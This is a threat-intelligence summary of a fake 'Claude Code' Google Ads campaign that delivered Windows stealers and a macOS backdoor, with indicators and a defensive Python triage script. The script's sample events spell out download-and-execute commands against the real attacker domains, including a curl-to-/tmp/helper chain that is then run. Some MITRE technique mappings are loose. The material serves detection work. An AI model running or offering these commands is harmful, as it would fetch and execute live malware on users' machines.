Windows and macOS Malware Spreads via Fake “Claude Code” Google Ads

Bitdefender found a malicious Google Ads campaign that impersonated Claude Code and redirected victims to a fake documentation site hosted on a Squarespace subdomain. The campaign delivered Windows stealers and a macOS backdoor through ClickFix-style commands, and was likely run using a compromised advertiser account linked to a Malaysian company. #ClaudeCode #Anthropic #GoogleAds #Squarespace

Keypoints

  • The attack used a deceptive Google sponsored result that impersonated Claude Code to lure users searching for downloads.
  • Victims were sent to a fake documentation page that closely mirrored the real Claude Code documentation and branding.
  • Windows users were tricked into running mshta.exe commands that downloaded and executed a malicious payload.
  • macOS users were given obfuscated terminal commands that decoded Base64 content and launched a multi-stage infection chain.
  • Bitdefender identified the Windows payloads as Trojan.Stealer.GJ, Trojan.Stealer.GK, IL:Trojan.MSILZilla.245316, and Gen:Variant.Barys.509034.
  • The macOS payload installed a Mach-O backdoor capable of spawning shells and enabling remote command execution.
  • Researchers believe the campaign leveraged a compromised advertiser account associated with a Malaysian company, which Google later deactivated.

MITRE Techniques

  • [T1059.001] PowerShell – Windows users were instructed to execute a malicious command through PowerShell to launch the infection chain (‘Windows users received instructions to run this in PowerShell’).
  • [T1218.005] Mshta – The attackers abused a legitimate Windows utility to download and execute a remote payload (‘The command abuses mshta.exe, a legitimate Microsoft utility designed to execute HTML Applications’).
  • [T1059.004] Unix Shell – The macOS payload was executed through shell commands piped into zsh and later used to spawn bash/zsh sessions (‘piped the decoded output directly into zsh’; ‘launch /bin/bash or /bin/zsh’).
  • [T1027] Obfuscated Files or Information – The malware and installer logic were heavily obfuscated using Base64, arithmetic decryption loops, and string hiding (‘decodes a Base64-encoded string’; ‘heavy string obfuscation’).
  • [T1140] Deobfuscate/Decode Files or Information – The script decoded Base64 content and decompressed embedded payloads before execution (‘decodes and decompresses embedded content, then executes it’).
  • [T1105] Ingress Tool Transfer – The malware fetched secondary payloads and helper binaries from attacker-controlled infrastructure (‘download and execute a remote payload’; ‘curl -o /tmp/helper https://wriconsult[.]com/n8n/update’).
  • [T1204.001] User Execution: Malicious File – The infection depended on the victim copying and running terminal commands from the fake installation page (‘the infection relies on the victim’s willingness to follow instructions’).
  • [T1055] Process Injection – The HTA stage recursively decrypted and loaded payloads into memory, leading to shellcode execution (‘decrypt a memory-embedded Microsoft Intermediate Language (MSIL) payload that results in a shellcode’).
  • [T1083] File and Directory Discovery – The macOS command removed extended attributes and changed file permissions before running the helper binary (‘xattr -c /tmp/helper && chmod +x /tmp/helper’).
  • [T1548.001] Abuse Elevation Control Mechanism: Setuid and Setgid – The report does not describe privilege escalation directly, but the abuse of trusted system utilities and the permission changes applied to the downloaded binary were used to facilitate execution (‘grant execution rights, and launches the binary’).

Indicators of Compromise

  • [SHA-256 hashes] Malware samples associated with the campaign – 79cd21185c51a5bfe2cfebdc51e14b258d91549fc0e4e09b6939c2a8a1c5ac19, 3b4d3a59024f14cf1f07395afd6957be05d125e00ae8fdcea3a5dee1d8ab9dd3, and 4 more hashes
  • [Domains] Fake ad landing and payload delivery infrastructure – claude-code-cmd.squarespace[.]com, download.active-version[.]com, and wriconsult[.]com
  • [URLs] Malicious download and lure links used in the campaign – hxxps://claude-code-cmd.squarespace[.]com, hxxp://code.claude[.]ai/download/, and hxxps://download.active-version[.]com/claude
  • [File names / paths] Downloaded helper and execution targets on macOS/Windows – /tmp/helper, mshta.exe, and HTA-related payload components
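As an added example (not Bitdefender's code and not taken from the report), the following Python triages constructed process-creation events against the behaviours listed under MITRE Techniques and the indicators listed above. It refangs the page's defanged domains and hashes, then applies command-line heuristics for the ClickFix stages the report describes: mshta.exe fetching a remote URL, Base64 decoded and piped into zsh, and curl writing a helper under /tmp followed by xattr -c and chmod +x. The regexes, the severity thresholds, the sample events and the `triage` function are my assumptions; the technique tags follow the page's own mapping.

```python
import re
from dataclasses import dataclass

# Indicators copied from the page in defanged form; refanged at load time so they
# can be compared against live telemetry.
DEFANGED_DOMAINS = [
    "claude-code-cmd.squarespace[.]com",
    "download.active-version[.]com",
    "wriconsult[.]com",
]
KNOWN_SHA256 = {
    "79cd21185c51a5bfe2cfebdc51e14b258d91549fc0e4e09b6939c2a8a1c5ac19",
    "3b4d3a59024f14cf1f07395afd6957be05d125e00ae8fdcea3a5dee1d8ab9dd3",
}


def refang(indicator: str) -> str:
    """Undo common defanging: hxxp -> http, [.] -> ., [:] -> :."""
    s = indicator.strip().lower()
    s = re.sub(r"^hxxps?://", lambda m: m.group(0).replace("hxxp", "http"), s)
    return s.replace("[.]", ".").replace("(.)", ".").replace("[:]", ":")


IOC_DOMAINS = {refang(d) for d in DEFANGED_DOMAINS}

# Command-line heuristics for the stages the report describes. The patterns are
# my assumptions about how these commands appear in process-creation logs, not
# signatures from Bitdefender; technique ids follow the page's own mapping.
RULES = [
    ("T1218.005", "mshta.exe fetching remote content",
     re.compile(r"\bmshta(\.exe)?\b.*\bhttps?://", re.I)),
    ("T1140", "Base64 decoded and piped into a shell",
     re.compile(r"\bbase64\s+(-d|--decode|-D)\b.*\|\s*(zsh|bash|sh)\b", re.I)),
    ("T1105", "curl/wget writing a helper binary under /tmp",
     re.compile(r"\b(curl|wget)\b.*\s-[oO]\s*/tmp/", re.I)),
    ("T1548.001", "quarantine attributes cleared and exec bit set",
     re.compile(r"\bxattr\s+-c\b.*\bchmod\s+\+x", re.I)),
]


@dataclass
class Finding:
    technique: str
    label: str


def extract_hosts(cmdline: str) -> set:
    """Hostnames of every http(s) URL in a command line, lower-cased."""
    return {h.lower() for h in re.findall(r"https?://([A-Za-z0-9.-]+)", cmdline)}


def triage(event: dict) -> dict:
    """Score one process-creation event: heuristic findings plus direct IoC hits."""
    cmdline = event.get("cmdline", "")
    findings = [Finding(tid, label) for tid, label, rx in RULES if rx.search(cmdline)]
    iocs = sorted(extract_hosts(cmdline) & IOC_DOMAINS)
    sha = event.get("sha256", "").lower()
    if sha in KNOWN_SHA256:
        iocs.append("sha256:" + sha)
    # A known indicator or two chained stages is high; a single heuristic alone is
    # worth a look but too noisy on its own to page anyone.
    if iocs or len(findings) >= 2:
        severity = "high"
    elif findings:
        severity = "medium"
    else:
        severity = "none"
    return {
        "host": event.get("host"),
        "severity": severity,
        "techniques": [f.technique for f in findings],
        "labels": [f.label for f in findings],
        "iocs": iocs,
    }


# Constructed sample events (not real telemetry). The first three mimic the stages
# described in the report, the fourth is benign activity that should score "none",
# and the fifth pairs one of the page's hashes with a placeholder command line.
SAMPLE_EVENTS = [
    {"host": "win-01", "cmdline": 'powershell.exe -c "mshta http://download.active-version.com/claude"'},
    {"host": "mac-02", "cmdline": "echo aGVsbG8K | base64 -d | zsh"},
    {"host": "mac-02", "cmdline": "curl -o /tmp/helper https://wriconsult.com/n8n/update && "
                                  "xattr -c /tmp/helper && chmod +x /tmp/helper && /tmp/helper"},
    {"host": "mac-03", "cmdline": "git clone https://github.com/example/repo"},
    {"host": "win-04", "cmdline": "<placeholder-binary>",
     "sha256": "79cd21185c51a5bfe2cfebdc51e14b258d91549fc0e4e09b6939c2a8a1c5ac19"},
]

if __name__ == "__main__":
    for ev in SAMPLE_EVENTS:
        print(triage(ev))
```

Running the script prints one triage record per sample event; in a real deployment `triage` would be fed from an EDR or Sysmon process-creation stream, and the heuristic rules would be tuned against the environment's own baseline of curl and base64 usage before the "medium" tier is routed anywhere.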


Read more: https://www.bitdefender.com/en-us/blog/labs/fake-claude-code-google-ads-malware